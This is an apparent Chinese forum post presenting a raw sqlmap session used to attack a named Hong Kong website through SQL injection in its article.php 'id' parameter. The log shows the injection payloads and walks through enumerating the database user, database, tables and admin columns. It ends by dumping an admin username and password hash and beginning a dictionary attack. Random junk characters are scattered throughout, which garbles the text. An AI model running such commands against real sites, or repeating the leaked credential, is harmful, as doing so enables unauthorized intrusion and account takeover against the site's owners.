D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db B6 D, p* f% P! W, k0 m2 s
ms "Mysql" --current-user /* 注解:获取当前用户名称
$ B9 V% ^ s2 Z, b! U0 [ sqlmap/0.9 - automatic SQL injection and database takeover tool, w! D0 M @; J# D
http://sqlmap.sourceforge.net starting at: 16:53:54" [. g( {0 _* t2 x- P6 j5 e# ?
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
2 J+ Z- n3 }5 d2 Y session file6 L0 m' w, H' K# f7 n i
[16:53:54] [INFO] resuming injection data from session file
% Z$ ^; R; E7 a z: M0 L0 }6 J! Q[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: {3 o6 P9 Q) f
[16:53:54] [INFO] testing connection to the target url5 N0 I+ ]" r# B
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 ]& U w& O& h7 x; H) Vsts:
- I6 ~3 {7 K, y k---$ M7 Y' \* o) ~% {( h
Place: GET
+ v8 }9 E2 L6 c8 L1 }* R& PParameter: id4 N' r3 R; ~- H
Type: boolean-based blind' _5 w1 W) g; ~; W e4 N% C
Title: AND boolean-based blind - WHERE or HAVING clause
0 X2 \3 b1 \9 ~' ~$ [ Payload: id=276 AND 799=799
4 |; \' s: Q5 @+ I- ~ Type: error-based- s x* M- p2 W* B, c
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" c) g7 F3 E% ` Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 g+ o7 w: w/ F120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 v5 M' q, o; ?3 L! |; g* M2 T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# `- V: n$ N4 H9 S* d8 @ Type: UNION query2 K9 ]! ^6 Z0 T% }7 U; h
Title: MySQL UNION query (NULL) - 1 to 10 columns9 L5 c! T$ O5 W" n% g0 I8 W, Z4 S2 g3 \
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% G4 G$ N8 V/ {7 W6 ^9 Y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 c1 J2 C6 w* `& D; t) A
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ M$ W f3 ]5 w2 K, x
Type: AND/OR time-based blind
9 S' J/ y, S8 u/ {# i7 q, @1 X# v0 y Title: MySQL > 5.0.11 AND time-based blind
' _/ m/ ~! P" F3 ], H7 v5 V Payload: id=276 AND SLEEP(5)
A/ A, O5 H4 k8 Y$ Q/ l---+ b" a0 H) t: H/ u% z
[16:53:55] [INFO] the back-end DBMS is MySQL3 l1 ?8 D; l0 G6 N+ [& ?% F" O
web server operating system: Windows
1 W0 E4 u! t- ~5 Q6 a* uweb application technology: Apache 2.2.11, PHP 5.3.0
1 A& j" h& A! }, V5 Q O6 bback-end DBMS: MySQL 5.0$ X0 }7 p& |. w1 l( P4 Q
[16:53:55] [INFO] fetching current user
3 ]& Q) N1 ^; d0 ^/ jcurrent user: 'root@localhost' ( h* A: y/ \. O
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou& T3 G% w, F. v8 W/ P+ _
tput\www.wepost.com.hk' shutting down at: 16:53:58
% B7 ^( B' H: N& t% X/ _# ~3 ~, b3 @4 j; }/ r! g4 x5 }0 K
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db W8 W+ }! ]% A: l6 \
ms "Mysql" --current-db /*当前数据库
}8 H* b1 o( c. N9 y" B0 W sqlmap/0.9 - automatic SQL injection and database takeover tool
. i w# c; n9 \; n3 x! @& h3 M) w http://sqlmap.sourceforge.net starting at: 16:54:16
! Q5 g/ x0 {6 H7 V5 z! }+ a1 L( E& i[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
6 I5 ~$ J9 M# o session file
, L' f- w0 U/ f[16:54:16] [INFO] resuming injection data from session file1 o7 m# o+ A8 w& @
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 E/ [+ ?5 u+ s2 p1 k* c[16:54:16] [INFO] testing connection to the target url
1 R8 A* e7 x; Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque/ i; ^4 D5 |) w, u7 c
sts:
- _# X9 T/ e. o( w; m---
7 H& h2 _% |6 S2 P" Q: z' XPlace: GET
/ r5 V6 b2 {; [Parameter: id
- K' @9 P5 T% c4 P* R4 K/ ] Type: boolean-based blind
; a) A& O* [0 r9 g& R Title: AND boolean-based blind - WHERE or HAVING clause' ^" V( g- I4 v' O' y) i A; x( X
Payload: id=276 AND 799=799( I3 J# I# t& S' Y8 w
Type: error-based9 j$ Q5 V' r4 V0 |
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause0 P; N J" O- K3 y
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! o; p" k( h0 s, {% _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 G, i. a$ Z, n3 v/ m
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* E6 n$ Z `3 F! ^ Type: UNION query) V* i3 H- k: C& W" I
Title: MySQL UNION query (NULL) - 1 to 10 columns; J9 o* o3 d# U3 n
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. U( }1 N! K- b4 y' |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* h0 g. q1 R/ \7 c6 \CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 O4 N5 }7 r3 ]% [0 m2 _
Type: AND/OR time-based blind
% u4 F$ S: l: y7 s3 `! S r0 V) V, j Title: MySQL > 5.0.11 AND time-based blind
# h, S- `( G& E6 H3 H% i1 M Payload: id=276 AND SLEEP(5)* I) }$ w& U0 m
---
4 S6 K( p( J+ @- f[16:54:17] [INFO] the back-end DBMS is MySQL
2 u8 i* H( t+ h# l! x. Vweb server operating system: Windows l! z1 s, W- [! P2 ^0 y
web application technology: Apache 2.2.11, PHP 5.3.0) n. R5 a( g6 v- W& | v" \( w
back-end DBMS: MySQL 5.09 s6 \8 H" |: w9 J7 ]
[16:54:17] [INFO] fetching current database
: U1 A/ H+ @6 {0 q& m- tcurrent database: 'wepost'
5 e* B/ f8 \# C4 \" a! N0 d r[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ e+ o: w$ q8 ~0 i4 S3 W9 q$ Y
tput\www.wepost.com.hk' shutting down at: 16:54:187 `7 {. k w8 s2 r2 w' y
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- v- @' B2 ~$ T& e. b. c/ F
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
: M3 p: j3 z* d' m: ~ sqlmap/0.9 - automatic SQL injection and database takeover tool% B1 I8 j3 k, @) |) r! T+ l2 w/ |% \
http://sqlmap.sourceforge.net starting at: 16:55:25% _3 @& }; Z! `& [* H# p
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
! ]3 s' K- _5 L4 P Q session file3 w2 U) z+ F4 O# R2 h6 e. k
[16:55:25] [INFO] resuming injection data from session file
9 \ E( w& q% ^# I8 t# j( [[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file- @" `" J0 S: u6 N
[16:55:25] [INFO] testing connection to the target url
# s6 @2 X, Y, }sqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 Z" T+ p. @4 N1 ^" ]% [( F6 q7 O; i) Wsts:
9 R j! y$ T. q7 `" D; _; h+ `- B5 l---1 z& h# a0 y) c( u6 b
Place: GET1 m6 A; v) q0 d* L) L+ K
Parameter: id3 i5 |: p+ ~) ], {- W5 F( n9 g9 |0 c
Type: boolean-based blind) }; V7 Q8 A9 l2 h* g, ?$ h/ k
Title: AND boolean-based blind - WHERE or HAVING clause
& Z' V0 C5 X5 ~& x$ W& j0 X( V Payload: id=276 AND 799=799
( s$ I/ e) H, p2 z Type: error-based0 ~9 J9 H' v- ~5 k1 d% i3 G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 A1 D6 I) c# E8 P9 b Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
% n$ ?$ j8 A0 D% T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( G- R3 Z, h+ Z# x. l& ]" O* U
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" e" D# l( `, b; K/ }- v9 B, B# w Type: UNION query v: ~; x, l* T2 s' f, G
Title: MySQL UNION query (NULL) - 1 to 10 columns8 r; e& l* E, d- D
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 e: @2 G5 |8 B: H(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: Z, {9 S/ i8 ~- q! k/ xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ O9 M, `( t! X) J w
Type: AND/OR time-based blind5 n+ u; N. D' {8 K1 ]
Title: MySQL > 5.0.11 AND time-based blind; Q8 {% p, I2 G: k/ U6 ?6 {
Payload: id=276 AND SLEEP(5)/ l7 @6 ~( R$ c0 |
---
) |' [: {! I( d) M+ B[16:55:26] [INFO] the back-end DBMS is MySQL2 N5 r3 `1 S8 u3 B* A {) C( C/ r
web server operating system: Windows
; n- B9 R& m% K: H% vweb application technology: Apache 2.2.11, PHP 5.3.0
# j$ k+ ~, [: D$ J8 ]! f9 aback-end DBMS: MySQL 5.0
) |5 A. h W8 k9 f4 `) M[16:55:26] [INFO] fetching tables for database 'wepost'. D! k$ D% J; B
[16:55:27] [INFO] the SQL query used returns 6 entries
2 I3 ^4 Z& J: `, P" oDatabase: wepost
% A6 l$ H" t# j[6 tables]4 ~8 ]8 u9 g: x; ]& a% ~( E
+-------------+5 p0 u) A6 A' X8 K. X( T" w
| admin |
. \# t! k0 I# t, v0 m J| article |
7 ]; w. x6 N6 E| contributor |
" H- K6 Y* B1 ^, a& d0 {| idea |& x6 a% Z% Z; a/ W- n
| image |
2 a7 r5 X2 m w0 n| issue |
0 B% Q/ \& l1 D9 w$ k+-------------+
$ P1 ]+ _: ~2 G/ M/ X4 \6 v6 {) t( s[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 r" ?, B; Z) q: H* Ztput\www.wepost.com.hk' shutting down at: 16:55:33
# V. v: @, c3 [2 }9 f# R+ M. D+ V$ [7 D, G' j# M5 ^
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
|- j& }; b2 j& vms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
r- d# E2 E9 {' j9 L sqlmap/0.9 - automatic SQL injection and database takeover tool
9 ~8 V9 a' p$ _ http://sqlmap.sourceforge.net starting at: 16:56:06
: k, H% k4 W- D8 ~0 Msqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 Z1 {/ e: W0 I) @ }. Gsts:
2 ], a& ?# x- b---
: r4 ~+ y; `) I4 y- z& PPlace: GET
0 i: T, }9 X/ f# L" u7 nParameter: id8 i& B6 @, J0 R. c4 M5 I
Type: boolean-based blind
* x }1 f9 q7 _9 w2 v4 ~ Title: AND boolean-based blind - WHERE or HAVING clause
7 g: q5 L% j/ A9 M# E Payload: id=276 AND 799=799
' Q+ u& _1 m7 A* x8 D) B& I& R Type: error-based2 g. V) y; n0 B3 Z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% d5 j4 F" J2 P4 ^$ k3 p Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* u9 l, p$ @ p9 S/ B% v8 q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: |9 n) @6 R Q; Z3 l
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 b! J% o- m% P2 U
Type: UNION query
7 n* M: W& A. v k6 U Title: MySQL UNION query (NULL) - 1 to 10 columns& w8 ]8 ^* m: k. k2 i
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. f% z7 I) G1 I4 ]
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# v% y, e& G" \5 D$ u+ aCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( D! {/ t$ u2 C: h Type: AND/OR time-based blind
7 D6 l' c. X( e& e8 w& }# V Title: MySQL > 5.0.11 AND time-based blind
! r; T2 U, V7 `0 x3 n Payload: id=276 AND SLEEP(5)
6 X: G* a& s1 r$ ~9 B: p---
2 n( T, r3 K2 d+ yweb server operating system: Windows
0 g2 b: R# K e/ Q8 [ X6 w3 [web application technology: Apache 2.2.11, PHP 5.3.0! r' H1 v2 E- Q4 M, u, L- p- F
back-end DBMS: MySQL 5.0
# A G# w, ]1 }1 S& ~ r[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
) O; j* n8 v) Fssion': wepost, wepost4 s5 f" a1 D. w* n4 n% u0 m. N
Database: wepost
; c9 G- k' a5 i# z7 B. @6 gTable: admin3 A/ G& `/ u" [
[4 columns]9 _7 k3 `8 r8 U* z {1 [$ Z9 \' W8 h
+----------+-------------+
& Q! g* a* ]5 q0 C) q| Column | Type |* E8 F3 z* b1 B
+----------+-------------+' L; N) h9 q6 s+ q
| id | int(11) |
8 ?$ b! }2 c4 |3 _| password | varchar(32) |
! J5 Z! s! ^3 q5 z8 v| type | varchar(10) |
: _* {+ B1 ^. N3 F- a3 p* o| userid | varchar(20) |( ^8 y8 \# r* M9 l8 t
+----------+-------------+
) ]* r8 l6 p. F shutting down at: 16:56:19
3 v: H9 T N3 z. d, f. E( c2 g" U: w0 S5 W0 \: R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 k. x! h' ~8 B
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容, H- s( I9 \2 L$ W( g$ E( q7 K8 w3 o
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 V: ]/ N* S0 Q/ \# A/ Q http://sqlmap.sourceforge.net starting at: 16:57:14
J; {, e* x1 {/ b; N- r! y- }0 i. Esqlmap identified the following injection points with a total of 0 HTTP(s) reque5 j- b) y0 ^+ j7 [3 S% w
sts:
; S0 J. h" _5 G& A---+ p1 h( Y. W9 Q+ c! s9 |
Place: GET
v" y8 w6 M5 B9 q V: LParameter: id
& [2 D% k* A9 \' Y Type: boolean-based blind
$ d0 @3 A5 r$ w6 C- A& r8 z% V5 i2 B Title: AND boolean-based blind - WHERE or HAVING clause
# V" R, W+ U: l* Y/ ]5 D Payload: id=276 AND 799=799
: T6 d( A1 z8 j! J3 G Type: error-based0 m% c- A9 n$ d6 m
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: s' D$ Z B& f7 {$ q5 P4 y
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 {# ^, I" V& Z+ ?7 z
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# U" E0 U! L9 F1 q6 V- X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# g8 a: H% b' I) ?9 d Type: UNION query
, a y8 r i. |6 ^" f f Title: MySQL UNION query (NULL) - 1 to 10 columns
% u( w4 r* ^ D8 T+ ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ _# @% l1 ?" T" x/ q# _+ ? {
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, ^; B/ [! E6 U3 p0 n
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 b1 N% \2 Q+ Q+ u* y) H, ? Type: AND/OR time-based blind
; C# ^, i y- w Title: MySQL > 5.0.11 AND time-based blind
1 W/ b; ~1 O0 C! `2 |4 \ Payload: id=276 AND SLEEP(5) {0 s3 o1 G9 P+ ? S+ g6 I5 \2 e2 y
---/ ^4 S0 K% q9 E6 i5 _0 Y4 A) c, U
web server operating system: Windows
c# E! y* X+ h4 g! G2 }web application technology: Apache 2.2.11, PHP 5.3.0/ g. t: C2 b% n' T& U
back-end DBMS: MySQL 5.0
' o3 z" E' b2 Y: Jrecognized possible password hash values. do you want to use dictionary attack o
# x3 E% S! M! \5 En retrieved table items? [Y/n/q] y
- Q0 d' N$ R3 v/ H8 U6 u* Zwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]: X' \1 ]$ N% i- e+ ?7 l& Y) {$ w6 [
do you want to use common password suffixes? (slow!) [y/N] y: s( {: G# e( j. |+ H1 b- N
Database: wepost
" Q+ z5 @+ S) E; c; @Table: admin
$ @2 m! E$ i. c: u* |( H[1 entry]% I1 p) Q6 ~5 H" r5 n
+----------------------------------+------------+
& l- H4 W$ f- ~0 x) y( z, F| password | userid |0 P) A3 H9 o* c% ~) F
+----------------------------------+------------+0 k8 H" `/ t/ ^# L) |
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |* w, g4 L8 `9 R$ z1 x, |! ]- m& m
+----------------------------------+------------+
( H4 o/ Y) x- y& F8 m4 l shutting down at: 16:58:14" c0 K" N5 Z! R$ H$ _+ H6 p4 t
( I) I. }( O' U$ A( Z5 aD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对